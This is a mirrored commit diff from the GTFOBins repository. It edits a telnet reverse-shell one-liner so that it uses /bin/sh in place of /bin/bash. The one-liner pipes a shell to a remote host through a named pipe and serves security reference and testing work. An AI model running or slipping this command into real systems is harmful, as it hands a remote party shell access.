mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-09-20 23:29:23 +02:00
Remove hardcoded instances of bash
This commit is contained in:
@@ -15,7 +15,7 @@ functions:
|
||||
RPORT=12345
|
||||
TF=$(mktemp)
|
||||
rm $TF
|
||||
mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/bash 1>$TF
|
||||
mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/sh 1>$TF
|
||||
sudo-enabled:
|
||||
- description: BSD version only. Needs to be connected first.
|
||||
code: |
|
||||
|
Reference in New Issue
Block a user